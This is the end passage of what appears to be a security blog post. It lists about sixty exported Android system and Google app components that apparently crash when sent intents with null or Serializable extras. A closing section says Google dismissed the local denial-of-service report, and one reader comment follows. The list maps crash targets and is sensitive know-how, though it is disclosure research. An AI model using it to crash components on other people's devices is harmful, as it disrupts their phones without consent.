com.google.android.tts com.google.android.tts/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.partnersetup com.google.android.partnersetup.RlzPingBroadcastReceiver Null/Serializable
com.android.safetyregulatoryinfo com.android.safetyregulatoryinfo.SafetyAndRegulatoryInfoActivity Serializable
com.google.android.videos com.google.android.videos/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.videos/com.google.android.videos.presenter.activity.AuxiliaryActivity Serializable
com.google.android.videos.mobile.presenter.activity.RestrictionsActivity$Receiver Serializable
com.google.android.apps.nexuslauncher com.google.android.apps.nexuslauncher.reflection.NewAppInstallReceiver$V26 Null/Serializable
com.android.launcher3.SessionCommitReceiver Null/Serializable
com.android.carrierdefaultapp com.android.carrierdefaultapp.CarrierDefaultBroadcastReceiver Null/Serializable
com.google.SSRestartDetector com.google.SSRestartDetector.SSRHandler Null/Serializable
com.google.android.feedback com.google.android.feedback/com.google.android.feedback.FeedbackActivity Null/Serializable
com.google.android.apps.photos com.google.android.apps.photos/com.google.android.libraries.abuse.reporting.ReportAbuseActivity Null
com.google.android.apps.photos/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.google.android.calendar com.google.android.calendar/com.android.calendar.AllInOneActivity Serializable
com.android.managedprovisioning com.android.managedprovisioning/com.android.managedprovisioning.finalization.FinalizationActivity Serializable
com.android.wallpaper.livepicker com.android.wallpaper.livepicker/com.android.wallpaper.livepicker.LiveWallpaperChange Serializable
com.android.settings com.android.settings/com.android.settings.Settings$ManageAppExternalSourcesActivity Null
com.android.settings/com.android.settings.bluetooth.DevicePickerActivity Null
com.android.settings/com.android.settings.Settings$IccLockSettingsActivity Serializable
com.android.settings/com.android.settings.Settings$TextToSpeechSettingsActivity Serializable
com.android.settings/com.android.settings.password.ConfirmDeviceCredentialActivity Serializable
com.android.settings/com.android.settings.Settings$DevelopmentSettingsDashboardActivity Serializable
com.android.settings/com.android.settings.Settings$WifiDisplaySettingsActivity Serializable
com.android.settings/com.android.settings.Settings$UsageAccessSettingsActivity Serializable
com.android.settings/com.android.settings.bluetooth.BluetoothPairingDialog Null
com.android.settings/com.android.settings.applications.InstalledAppDetailsTop Null
com.android.settings.bluetooth.BluetoothPairingRequest Null
com.android.settings/com.android.settings.Settings$ZenModeSettingsActivity Serializable
com.android.settings/com.android.settings.Settings$MobileDataUsageListActivity Serializable
com.google.android.wfcactivation com.google.android.wfcactivation/com.google.android.wfcactivation.WfcActivationActivity Serializable
com.google.android.apps.pixelmigrate com.google.android.apps.pixelmigrate/com.google.android.apps.pixelmigrate.component.CloudRestoreFlowActivity Null
com.google.android.apps.pixelmigrate/com.google.android.apps.pixelmigrate.component.RestoreProgressActivity Serializable
com.google.android.apps.pixelmigrate.util.SetupWizardLifecycleReceiver Serializable
com.google.android.settings.intelligence com.google.android.settings.intelligence/com.google.android.settings.intelligence.modules.suggestions.NightlightTrampolineActivity Serializable
com.google.android.settings.intelligence.libs.experiment.PhenotypeBroadcastReceiver Serializable
com.google.android.tetheringentitlement com.google.android.tetheringentitlement/com.google.android.tetheringentitlement.CarrierEntitlementActivity Serializable
com.android.cts.ctsshim com.android.cts.ctsshim/com.android.cts.ctsshim.InstallPriority Null/Serializable
com.android.vpndialogs com.android.vpndialogs/com.android.vpndialogs.ConfirmDialog Serializable
com.google.android.apps.wallpaper com.google.android.apps.wallpaper/com.google.android.apps.wallpaper.picker.StandalonePreviewActivity Serializable
com.google.android.apps.wallpaper.module.GoogleAlarmInitializer Null
com.google.android.talk com.google.android.talk/com.google.android.apps.hangouts.stub.PlayStoreRedirectActivity Serializable
com.android.phone com.android.phone/com.android.phone.NetworkSelectSettingActivity Null
com.android.phone/com.android.phone.settings.VoicemailSettingsActivity Serializable
com.android.services.telephony.sip.SipIncomingCallReceiver Null/Serializable
com.google.vr.vrcore com.google.vr.vrcore/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.android.emergency (every activity in this package) Serializable
com.android.systemui com.android.systemui/com.android.systemui.ForegroundServicesDialog Serializable
com.android.systemui/com.android.systemui.SlicePermissionActivity Serializable
com.android.systemui/com.android.systemui.media.MediaProjectionPermissionActivity Serializable
com.android.traceur com.android.traceur.MainActivity Serializable
com.google.android.apps.helprtc com.google.android.apps.helprtc/com.google.android.apps.helprtc.ui.InvitationActivity Serializable
com.google.android.apps.gcs com.google.android.apps.gcs/com.google.android.apps.gcs.WifiAssistantOptInActivity Serializable
com.android.bluetooth com.android.bluetooth.opp.BluetoothOppReceiver Null/Serializable
com.android.bluetooth/.pbap.BluetoothPbapService Serializable
com.android.captiveportallogin com.android.captiveportallogin/com.android.captiveportallogin.CaptivePortalLoginActivity Null/Serializable
com.google.android.GoogleCamera com.google.android.GoogleCamera/com.google.android.apps.camera.legacy.app.activity.CameraDeepLinkActivity Null
com.google.android.GoogleCamera/com.google.android.libraries.social.licenses.LicenseMenuActivity Serializable
com.android.connectivity.metrics com.android.connectivity.metrics.SnapshotSchedulingReceiver Null/Serializable
com.google.android.inputmethod.latin com.google.android.inputmethod.latin/com.google.android.apps.inputmethod.libs.search.sticker.AppIndexingActivity Serializable
com.google.android.gms.analytics.CampaignTrackingReceiver Serializable
com.google.android.storagemanager com.google.android.storagemanager/com.android.storagemanager.deletionhelper.DeletionHelperActivity Serializable

0x6 Closing

Because a local crash has so little impact, even though this is a generic bug it still does not meet Google's bar for a vulnerability (a DoS must at least force a system reboot), and the report was dismissed 😂😂😂

1 comment:

  1. May I ask which good open-source tools you would recommend for Android vulnerability hunting?